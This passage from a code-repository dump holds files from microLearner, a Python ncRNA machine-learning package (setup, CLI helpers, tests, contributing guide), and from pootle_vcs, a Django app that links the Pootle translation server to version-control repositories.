"src_encoding": "UTF-8", "text": "_microLearner_completion() {\n COMPREPLY=( $( COMP_WORDS=\"${COMP_WORDS[*]}\" \\\n COMP_CWORD=$COMP_CWORD \\\n _MICROLEARNER_COMPLETE=complete $1 ) )\n return 0\n}\n\ncomplete -F _microLearner_completion -o default microLearner;\n" }, { "alpha_fraction": 0.5050167441368103, "alphanum_fraction": 0.5117056965827942, "avg_line_length": 30.473684310913086, "blob_id": "5972320d41037f15b903d9b8ffbe2f3baf87f088", "content_id": "8e37ec70aeac517dd60d6369f581a6ffa19be7b7", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 598, "license_type": "permissive", "max_line_length": 78, "num_lines": 19, "path": "/microLearner/instances.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\nfrom __future__ import print_function\nfrom pandas import DataFrame\n\n\nclass Instances(DataFrame):\n '''\n '''\n def __init__(self, features, outcome):\n self.features = features\n self.outcome = outcome\n" }, { "alpha_fraction": 0.6110865473747253, "alphanum_fraction": 0.6208038926124573, "avg_line_length": 35.51612854003906, "blob_id": "ef6755fc1405d63c4425c7d2ca047af70425cc44", "content_id": "10473d80ada3054137e67c7bef6a3edd20c23161", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4528, "license_type": "permissive", "max_line_length": 98, "num_lines": 124, "path": "/setup.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\n# The PACKAGE is the top-level folder containing the __init__.py module\n# that should be in the same directory as your setup.py file\nPACKAGE = \"microLearner\"\n# The NAME is what people will refer to your software as,\n# the name under which your software is listed in PyPI and\n# under which users will install it (for example, pip install NAME)\nNAME = \"microLearner\"\nDESCRIPTION = \"Python package for ncRNA annotation\"\nAUTHOR = \"microLearner development team\"\nAUTHOR_EMAIL = \"[email protected]\"\nURL = \"https://github.com/RNAer/microLearner\"\nVERSION = __import__(PACKAGE).__version__\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n\n# Get the long description from the relevant file\nwith open('README.md') as f:\n long_description = f.read()\n\nsetup(\n name=NAME,\n\n # Versions should comply with PEP440. For a discussion on single-sourcing\n # the version across setup.py and the project code, see\n # http://packaging.python.org/en/latest/tutorial.html#version\n version=VERSION,\n\n # What does your project relate to?\n keywords=['Microbiome', 'Machine Learning', 'Bioinformatics'],\n\n description=DESCRIPTION,\n\n long_description=long_description,\n\n # The project's main homepage.\n url=URL,\n\n # Author details\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n\n # Choose your license\n license='BSD',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 2 - Pre-Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Intended Audience :: Bioinformatician',\n\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: BSD License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n ],\n\n # You can just specify the packages manually here if your project is\n # simple. Or you can use find_packages().\n packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n\n # List run-time dependencies here. These will be installed by pip when\n # your project is installed. For an analysis of \"install_requires\" vs pip's\n # requirements files see:\n # https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files\n install_requires=['numpy >= 1.7',\n 'scipy >= 0.13.0',\n 'matplotlib >= 1.1.0',\n 'scikit-learn',\n 'click',\n # 'biom',\n 'pandas',\n 'future'],\n extras_require={'test': [\"nose >= 0.10.1\", \"pep8\", \"flake8\"],\n 'doc': [\"Sphinx >= 1.2.2\", \"sphinx-bootstrap-theme\"]},\n\n # Include additional files into the package\n include_package_data=True,\n\n # If there are data files included in your packages that need to be\n # installed, specify them here. If using Python 2.6 or less, then these\n # have to be included in MANIFEST.in as well.\n package_data={\n 'microLearner': ['data/*'],\n },\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n entry_points={\n 'console_scripts': [\n 'microLearner=microLearner.cmd:microLearner',\n ],\n },\n\n test_suite='nose.collector'\n)\n" }, { "alpha_fraction": 0.649789035320282, "alphanum_fraction": 0.6540084481239319, "avg_line_length": 17.230770111083984, "blob_id": "c2a54650dcd587f9b6be51b90be7565dd118952a", "content_id": "6c3242757bb6525964f7daddf0d0810c273a00be", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "permissive", "max_line_length": 44, "num_lines": 13, "path": "/microLearner/tests/test_instances.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom microLearner.instances import Instances\nfrom unittest import TestCase, main\n\n\nclass InstancesTests(TestCase):\n def setUp(self):\n self.a1 = Instances('a', 'b')\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5332188010215759, "alphanum_fraction": 0.5366551876068115, "avg_line_length": 32.57692337036133, "blob_id": "cd1c04a32bc0450ce33048af7a53fd85dff1e4f4", "content_id": "fc94e99d812bb639be429c65333b9b2861edda88", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1746, "license_type": "permissive", "max_line_length": 78, "num_lines": 52, "path": "/microLearner/util/misc.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport click\n\n\nclass AliasedGroup(click.Group):\n ''' Alias for commands.\n\n This implements a subclass of click.Group that accepts a prefix\n for a command. If there were a (sub)command called \"push\", it would\n accept \"pus\" as an alias (so long as it was unique).\n '''\n def get_command(self, ctx, cmd_name):\n rv = click.Group.get_command(self, ctx, cmd_name)\n if rv is not None:\n return rv\n matches = [x for x in self.list_commands(ctx)\n if x.startswith(cmd_name)]\n if not matches:\n return None\n elif len(matches) == 1:\n return click.Group.get_command(self, ctx, matches[0])\n ctx.fail('Too many matches: %s' % ', '.join(sorted(matches)))\n\n\nclass MultiParamType(click.ParamType):\n def __init__(self, name=None, func=None):\n if name is not None:\n self.name = ' '.join('Multiple', func.__name__)\n else:\n self.name = name\n self.func = func\n\n def convert(self, value, param, ctx):\n try:\n values = [i for i in value.split(',') if i]\n if self.func is None:\n return values\n else:\n return [self.func(i) for i in values]\n except ValueError:\n self.fail('%s is not a valid' % value, param, ctx)\n\nmulti_int = MultiParamType(func=int)\n" }, { "alpha_fraction": 0.5054945349693298, "alphanum_fraction": 0.5183150172233582, "avg_line_length": 33.125, "blob_id": "492311ad5a89dbb8c0a71e0820508792d31e8ba2", "content_id": "e62797405e481ff3b7a92790627d674bbb8bf3fc", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 546, "license_type": "permissive", "max_line_length": 78, "num_lines": 16, "path": "/microLearner/__init__.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\n__credits__ = \"microLearner development team\"\n__version__ = \"1.0.0-dev\"\n\nfrom numpy.testing import Tester\ntest = Tester().test,\n" }, { "alpha_fraction": 0.7686547636985779, "alphanum_fraction": 0.7716671228408813, "avg_line_length": 83.1956558227539, "blob_id": "364270b8b89593ab27a480ec57fe3ed220e02be4", "content_id": "318f0d786e49bc15afba0a6287dfca39039beb17", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11623, "license_type": "permissive", "max_line_length": 851, "num_lines": 138, "path": "/CONTRIBUTING.md", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "Contributing to microLearner\n======================\n\nmicroLearner is an open source software package, and we welcome community contributions. You can find the source code and test code for microLearner under public revision control in the microLearner git repository.\n\nThis document will help you get started with contributing to microLearner. You should read this whole document before considering submitting code to microLearner. This will save time for both you and the microLearner developers.\n\nType of Submissions\n-------------------\n\nSome of the types of contributions we're interested in are new features (big or small, but for big ones it's generally a good idea to ask us if we're interested in including it before starting development), bug fixes, and documentation updates, additions, and fixes.\n\nWhen considering submitting a new feature to microLearner, you should begin by posting an issue to the [microLearner issue tracker](https://github.com/RNAer/microLearner/issues). The information that you include in that post will differ based on the type of contribution. Your contribution will also need to be fully tested (discussed further below).\n\n* For new features, you'll want to describe why the functionality that you are proposing to add is relevant. For it to be relevant, it should be demonstrably useful to microLearner users. This typically means that a new analytic method is implemented (you should describe why it's useful, ideally including a link to a paper that uses this method), or an existing method is enhanced (your implementation matches the performance of the pre-existing method while reducing runtime, memory consumption, etc, or it improves performance over the pre-existing method). We will request benchmark results comparing your method to the pre-existing methods (which would also be required for publication of your method) so pointing to a paper or other document containing benchmark results, or including benchmark results in your issue, will speed up the process.\n\n* For bug fixes, you should provide a detailed description of the bug so other developers can reproduce it. We take bugs in microLearner very seriously. Bugs can be related to errors in code, documentation, or tests. Errors in documentation or tests are usually updated in the next major release of microLearner. Errors in code that could result in incorrect results or inability to access certain functionality may result in a new minor release of microLearner.\n\n You should include the following information in your bug report:\n\n 1. The exact command or function call that you issue to create the bug.\n 2. A link to all necessary input files for reproducing the bug. These files should only be as large as necessary to create the bug. For example, if you have an input file with 10,000 data points but the error only arises due to one of them, create a new input file with a few data points including that one, run the command that was giving you problems, and verify that you still get an error. Then post that command and link to the trimmed input file. This is *extremely* useful to other developer, and it is likely that if you don't provide this information you'll get a response asking for it. Often this process helps you to better understand the bug as well.\n\n* For documentation additions, you should first post an issue describing what you propose to add, where you'd like to add it in the documentation, and a description of why you think it's an important addition. For documentation improvements and fixes, you should post an issue describing what is currently wrong or missing, and how you propose to address it. For more information about building and contributing to microLearner's documentation, see [this guide](doc/README.md).\n\nWhen you post your issue, the microLearner developers will respond to let you know if we agree with the addition or change. It's very important that you go through this step to avoid wasting time working on a feature that we are not interested in including in microLearner.\n\n\nGetting started: \"help wanted\"\n------------------------------\n\nSome of our issues are labeled as ``help wanted``. Working on [these issues](https://github.com/RNAer/microLearner/issues?direction=desc&labels=quick+fix%2Chelp+wanted&page=1&sort=updated&state=open) is a good way to get started with contributing to microLearner. These are usually small bugs or documentation errors that will only require one or a few lines of code to fix. Getting started by working on one of these issues will allow you to familiarize yourself with our development process before committing to a large amount of work (e.g., adding a new feature to microLearner). If you're interested in working on one of these issues, you should comment on the issue requesting that it be assigned to you.\n\n\nCode Review\n-----------\n\nWhen you submit code to microLearner, it will be reviewed by one or more microLearner developers. These reviews are intended to confirm a few points:\n\n* Your code is sufficiently well-tested (see Testing Guidelines below).\n* Your code adheres to our Coding Guidelines (see Coding Guidelines below).\n* Your code is sufficiently well-documented (see Coding Guidelines below).\n* Your code provides relevant changes or additions to microLearner (Type of Submissions above).\n\nThis process is designed to ensure the quality of microLearner, and can be a very useful experience for new developers.\n\nParticularly for big changes, if you'd like feedback on your code in the form of a code review as you work, you should request help in the issue that you created and the microLearner developers will work with you to perform regular code reviews. This can greatly reduce development time (and frustration) so we highly recommend that new developers take advantage of this rather than submitting a pull request with a massive amount of code in one chunk. That can lead to frustration when the developer thinks they are done, but the reviewer requests large amounts of changes, and it is also very hard to review.\n\n\nSubmitting code to microLearner\n-------------------------------\n\nmicroLearner is hosted on [GitHub](http://www.github.com), and we use GitHub's [Pull Request](https://help.github.com/articles/using-pull-requests) mechanism for accepting submissions. You should go through the following steps to submit code to microLearner.\n\n1. Begin by [creating an issue](https://github.com/RNAer/microLearner/issues) describing your proposed change. This should include a description of your proposed change (is it a new feature, a bug fix, etc.), and note in the issue description that you want to work on it. Once you hear back from a maintainer that it is OK to make changes (i.e., they dont't have local edits, they agree with the change you'd like to make, and they're comfortable with you editing their code), we will assign the issue to you on GitHub.\n\n2. [Fork](https://help.github.com/articles/fork-a-repo) the microLearner repository on the GitHub website to your GitHub account.\n\n3. Clone your forked repository to the system where you'll be developing with ``git clone``.\n\n4. Ensure that you have the latest version of all files (especially important if you cloned a long time ago, but you'll need to do this before submitting changes regardless). You should do this by adding microLearner as a remote repository and then pulling from that repository. You'll only need to run the ``git remote`` step one time:\n ```\n git checkout master\n git remote add upstream https://github.com/RNAer/microLearner.git\n git pull upstream master\n ```\n\n5. Create a new topic branch that you will make your changes in with ``git checkout -b``:\n ```\n git checkout -b my-topic-branch\n ```\n\n6. Run ``nosetests --with-doctest ; flake8 microLearner setup.py`` to confirm that the tests pass before you make any changes. (you need to install flake8 ``pip install flake8``).\n\n7. Make your changes, add them (with ``git add``), and commit them (with ``git commit``). Don't forget to update associated scripts and tests as necessary. You should make incremental commits, rather than one massive commit at the end. Write descriptive commit messages to accompany each commit.\n\n8. When you think you're ready to submit your code, again ensure that you have the latest version of all files in case some changed while you were working on your edits. You can do this by merging master into your topic branch:\n ```\n git checkout my-topic-branch\n git pull upstream master\n ```\n\n9. Run ``nosetests --with-doctest ; flake8 microLearner setup.py`` to ensure that your changes did not cause anything expected to break. \n\n10. Once the tests pass, you should push your changes to your forked repository on GitHub using:\n ```\n git push origin my-topic-branch\n ```\n\n11. Issue a [pull request](https://help.github.com/articles/using-pull-requests) on the GitHub website to request that we merge your branch's changes into microLearner's master branch. One of the microLearner developers will review your code at this stage. If we request changes (which is very common), *don't issue a new pull request*. You should make changes on your topic branch, and commit and push them to GitHub. Your pull request will update automatically.\n\n12. Edit mode.\n\n Packages normally install under site-packages, but when you’re making changes, it makes more sense to run the package straight from the your local directory of the package. \"Editable\" installation creates a .pth file in site-packages that extends Python’s import path to find the package:\n ```\n pip install --editable path/to/the/package\n ```\n\n Once it is installed as edit mode, you can run the commands of the package. This is *really* helpful to see the effect of your changes in real time.\n\nCoding Guidelines\n-----------------\n\nWe adhere to the [PEP 8](http://www.python.org/dev/peps/pep-0008/) python coding guidelines for code and documentation standards. Before submitting any code to microLearner, you should read these carefully and apply the guidelines in your code.\n\n\nTesting Guidelines\n------------------\n\nAll code that is added to microLearner must be unit tested, and the unit test code must be submitted in the same pull request as the library code that you are submitting. We will not merge code that is not unit tested. The PyCogent Coding Guidelines describe our [expectations for unit tests](http://pycogent.org/coding_guidelines.html?highlight=coding%20guidelines#how-should-i-test-my-code). You should review the unit test section before working on your test code.\n\nTests can be executed using [nose](https://nose.readthedocs.org/en/latest/) by running `nosetests --with-doctest` from the base directory of the project or from within a Python or IPython session running the following code:\n\n``` python\n>>> import microLearner\n>>> microLearner.test()\n# full test suite is executed\n>>> microLearner.until.test()\n# tests for the util module are executed\n```\n\nNote that this is possible because the lines below are added at the end of each `__init__.py` file in the package, so if you add a new module, be sure to include these lines in its `__init__.py`:\n\n``` python\nfrom numpy.testing import Tester\ntest = Tester().test\n```\n\n\nDocumentation Guidelines\n------------------------\n\nWe strive to keep microLearner's code well-documented, particularly its public-facing API. See our [documentation guide](doc/README.md) for more details on writing documentation in microLearner.\n\nGetting help with git\n=====================\n\nIf you're new to ``git``, you'll probably find [gitref.org](http://gitref.org/) helpful.\n" } ]
9
phlax/pootle_vcs
https://github.com/phlax/pootle_vcs
d67d5de2742dbd517e9e99b9756bd9e4f12a7af6
5b993249c5eafedc73396e0b919f988c07e00b0e
3177471423d253d4f1266c996c2e9ceb3dee3e87
refs/heads/master
2021-01-10T06:17:29.229728
2015-09-28T12:24:55
2015-09-28T12:24:55
43,052,576
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.611872136592865, "alphanum_fraction": 0.611872136592865, "avg_line_length": 16.316831588745117, "blob_id": "612acc165b61d3943c926a29962d3f1b6d82e62c", "content_id": "152d3a3009c816d54a721f437dc895560c5fa6e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1752, "license_type": "no_license", "max_line_length": 79, "num_lines": 101, "path": "/README.rst", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "Pootle VCS\n----------\n\nPootle VCS app\n\n\n``vcs`` command\n---------------\n\nGet VCS info for all projects\n\n.. code-block:: bash\n\n pootle vcs\n\n\n``set_vcs`` subcommand\n----------------------\n\nSet the VCS for a project. Project must exist in Pootle.\n\n.. code-block:: bash\n\n pootle vcs myproject set_vcs git [email protected]:translate/myprojrepo\n\n\n``info`` subcommand\n-------------------\n\nGet the VCS info for a project. This is the default command - so ``info`` can\nbe ommitted.\n\n.. code-block:: bash\n\n pootle vcs myproject info\n\nor...\n\n.. code-block:: bash\n\n pootle vcs myproject\n\n\n``fetch_translations`` subcommand\n---------------------------------\n\nPull the VCS repository, and create a store_vcs object for each repository file\nthat has been matched from the ``.pootle.ini`` configuration file.\n\n.. code-block:: bash\n\n pootle vcs myproject fetch_translations\n\n\n``status`` subcommand\n---------------------\n\nList the status of files in Pootle and VCS - specifically files that are:\n\n- only in Pootle\n- only in VCS\n- updated in Pootle\n- updated in VCS\n- updated in both Pootle and VCS\n\n.. code-block:: bash\n\n pootle vcs myproject status\n\n\n``pull_translations`` subcommand\n--------------------------------\n\nPull translations from VCS into Pootle:\n\n- Create stores in Pootle where they dont exist already\n- Update exisiting stores from VCS translation file\n\n.. code-block:: bash\n\n pootle vcs myproject pull_translations\n\n\n\n---------------------------------------------\n\nProposed/unimplemented\n^^^^^^^^^^^^^^^^^^^^^^\n\n\n``add_translation`` subcommand\n------------------------------\n\nAdd a translation from Pootle into VCS\n\n\n\n``commit_translations`` subcommand\n----------------------------------\n\nCommit and push translations from Pootle into VCS\n\n\n\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.5909090638160706, "avg_line_length": 21, "blob_id": "566c5b6b0a5c6476012bc1d729b8a43c4311adb0", "content_id": "f4b32d4e99ac7267fa9579d6537ecadede0c8b5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 57, "num_lines": 19, "path": "/pootle_vcs/migrations/0006_auto_20150923_2212.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pootle_vcs', '0005_projectvcs_push_frequency'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='projectvcs',\n old_name='pull_frequency',\n new_name='fetch_frequency',\n ),\n ]\n" }, { "alpha_fraction": 0.6495059728622437, "alphanum_fraction": 0.6547061800956726, "avg_line_length": 27.701492309570312, "blob_id": "7530a7275a6dd36cab1ee63af9a12bb446e051c2", "content_id": "cee735ec53604b7a1ab6772700f4cea12214ec98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1923, "license_type": "no_license", "max_line_length": 77, "num_lines": 67, "path": "/pootle_vcs/models.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "from django.db import models\n\nfrom pootle_project.models import Project\nfrom pootle_store.models import Store\n\nfrom . import plugins\n\n\nclass StoreVCS(models.Model):\n store = models.ForeignKey(Store, related_name='vcs')\n last_sync_revision = models.IntegerField(blank=True, null=True)\n last_sync_commit = models.CharField(max_length=32, blank=True, null=True)\n path = models.CharField(max_length=32)\n\n @property\n def vcs(self):\n return self.store.translation_project.project.vcs.get()\n\n @property\n def repository_file(self):\n return self.vcs.plugin.file_class(\n self.vcs,\n self.path,\n self.store.translation_project.language,\n self.store.name,\n [s.name for s in self.store.parent.trail()])\n\n\nclass ProjectVCS(models.Model):\n project = models.ForeignKey(Project, related_name='vcs')\n url = models.URLField()\n vcs_type = models.CharField(max_length=32)\n enabled = models.BooleanField(default=True)\n fetch_frequency = models.IntegerField(default=0)\n push_frequency = models.IntegerField(default=0)\n pootle_config = models.CharField(max_length=32, default=\".pootle.ini\")\n\n @property\n def plugin(self):\n return plugins[self.vcs_type](self)\n\n ###########################\n # VCS Plugin implementation\n\n def pull(self):\n return self.plugin.pull()\n\n def get_latest_commit(self):\n return self.plugin.get_latest_commit()\n\n def fetch_translation_files(self):\n return self.plugin.fetch_translation_files()\n\n def list_translation_files(self):\n return self.plugin.translation_files\n\n def pull_translation_files(self):\n return self.plugin.pull_translation_files()\n\n def read_config(self):\n return self.plugin.read_config()\n\n def status(self):\n return self.plugin.status()\n\n # VCS Plugin implementation\n ###########################\n" }, { "alpha_fraction": 0.5480880737304688, "alphanum_fraction": 0.5608342885971069, "avg_line_length": 30.962963104248047, "blob_id": "5f09404cc4da66a4625835206f94be003f21f377", "content_id": "7e111b6ece66247399ce17f3ae603a33dd06a847", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 863, "license_type": "no_license", "max_line_length": 114, "num_lines": 27, "path": "/pootle_vcs/migrations/0008_storevcs.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pootle_store', '0002_make_suggestion_user_not_null'),\n ('pootle_vcs', '0007_projectvcs_pootle_config'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='StoreVCS',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('last_sync_revision', models.IntegerField(null=True, blank=True)),\n ('last_sync_commit', models.CharField(max_length=32)),\n ('store', models.ForeignKey(related_name='vcs', to='pootle_store.Store')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.6727272868156433, "alphanum_fraction": 0.6755244731903076, "avg_line_length": 27.600000381469727, "blob_id": "97769f2863e8b8fe1ce7cf9ff05f445f3c4602da", "content_id": "b741d8593cead3b2ea51092b059746ea422da1ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 715, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/pootle_vcs/management/commands/__init__.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom pootle_vcs.models import ProjectVCS\n\n\nclass SubCommand(BaseCommand):\n\n requires_system_checks = False\n\n def get_vcs(self, project):\n try:\n return project.vcs.get()\n except ProjectVCS.DoesNotExist:\n raise CommandError(\n \"Project (%s) is not managed in VCS\"\n % project.code)\n" }, { "alpha_fraction": 0.6855421662330627, "alphanum_fraction": 0.6963855624198914, "avg_line_length": 32.8775520324707, "blob_id": "ebccc72ef8808ccf9f76d5c7d57ab233836eb50b", "content_id": "2ed0dc6d7889682117b7af7b110b4c2ab23589ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1660, "license_type": "no_license", "max_line_length": 79, "num_lines": 49, "path": "/setup.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2006-2013 Translate House\n#\n# This file is part of Pootle_Vcs.\n#\n# Pootle_Vcs is free software; you can redistribute it and/or modify it under\n# the terms of the GNU General Public License as published by the Free Software\n# Foundation; either version 2 of the License, or (at your option) any later\n# version.\n#\n# Pootle_Vcs is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR\n# A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along with\n# Pootle_Vcs; if not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"A setuptools based setup module.\n\nSee:\nhttps://packaging.python.org/en/latest/distributing.html\nhttps://github.com/pypa/sampleproject\n\"\"\"\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n\nsetup(\n name='pootle_vcs',\n version='0.0.1',\n description='Pootle VCS integration',\n long_description=\"Integration between Pootle and VCS backends\",\n url='https://github.com/phlax/pootle_vcs',\n author='Ryan Northey',\n author_email='[email protected]',\n license='GPL3',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: GPL3',\n 'Programming Language :: Python :: 2.7',\n ],\n keywords='pootle vcs',\n packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n install_requires=['rq_scheduler', 'pootle'],\n)\n" }, { "alpha_fraction": 0.5414634346961975, "alphanum_fraction": 0.5829268097877502, "avg_line_length": 20.578947067260742, "blob_id": "227898023c29c7367c971e7c0757d9edd0e8f264", "content_id": "e506c43fb6622d56c09689c686a3b951af74c4cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 410, "license_type": "no_license", "max_line_length": 50, "num_lines": 19, "path": "/pootle_vcs/migrations/0004_auto_20150923_2206.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pootle_vcs', '0003_auto_20150923_2155'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='projectvcs',\n old_name='poll_frequency',\n new_name='pull_frequency',\n ),\n ]\n" }, { "alpha_fraction": 0.5215517282485962, "alphanum_fraction": 0.5232758522033691, "avg_line_length": 29.526315689086914, "blob_id": "66d88ec7447ff175f82104b610be76c13ca46093", "content_id": "3e61c2950b6aa9010d423d86b4364b0c126fa8c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1160, "license_type": "no_license", "max_line_length": 60, "num_lines": 38, "path": "/pootle_vcs/finder.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "import os\nimport re\n\n\nclass TranslationFileFinder(object):\n\n path_mapping = (\n (\".\", \"\\.\"),\n (\"<lang>\", \"(?P<lang>[\\w]*)\"),\n (\"<filename>\", \"(?P<filename>[\\w]*)\"),\n (\"<directory_path>\", \"(?P<directory_path>[\\w\\/]*)\"))\n\n def __init__(self, translation_path):\n self.translation_path = translation_path\n self.regex = re.compile(self._parse_path())\n\n @property\n def file_root(self):\n file_root = self.translation_path.split(\"<\")[0]\n if not file_root.endswith(\"/\"):\n file_root = \"/\".join(file_root.split(\"/\")[:-1])\n return file_root\n\n def find(self):\n # TODO: make sure translation_path has no ..\n # ..validate\n for root, dirs, files in os.walk(self.file_root):\n for filename in files:\n file_path = os.path.join(root, filename)\n match = self.regex.match(file_path)\n if match:\n yield file_path, match.groupdict()\n\n def _parse_path(self):\n path = self.translation_path\n for k, v in self.path_mapping:\n path = path.replace(k, v)\n return path\n" }, { "alpha_fraction": 0.5743898153305054, "alphanum_fraction": 0.5743898153305054, "avg_line_length": 27.216981887817383, "blob_id": "b028ed41b512547d863a1fb700680b73ed082636", "content_id": "219890cb249e0ed04edbbff3e6d8753ef2f93623", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2991, "license_type": "no_license", "max_line_length": 75, "num_lines": 106, "path": "/pootle_vcs/files.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "import os\n\nfrom import_export.utils import import_file\n\nfrom pootle_store.models import Store\nfrom pootle_translationproject.models import TranslationProject\n\n\nclass RepositoryFile(object):\n\n def __init__(self, vcs, path, language, filename, directory_path=None):\n self.vcs = vcs\n self.language = language\n self.filename = filename\n if directory_path is not None:\n self.directory_path = '/'.join(directory_path)\n else:\n self.directory_path = []\n self.path = path\n\n def __str__(self):\n return \"<%s: %s>\" % (self.__name__, self.pootle_path)\n\n @property\n def pootle_path(self):\n return \"/\".join(\n ['']\n + [x for x in\n [self.language.code,\n self.project.code,\n self.directory_path,\n self.filename]\n if x])\n\n @property\n def file_path(self):\n return os.path.join(\n self.vcs.plugin.local_repo_path,\n self.path.strip(\"/\"))\n\n @property\n def exists(self):\n return os.path.exists(self.file_path)\n\n @property\n def project(self):\n return self.vcs.project\n\n @property\n def translation_project(self):\n try:\n return self.project.translationproject_set.get(\n language=self.language)\n except TranslationProject.DoesNotExist:\n return TranslationProject.objects.create(\n project=self.vcs.project,\n 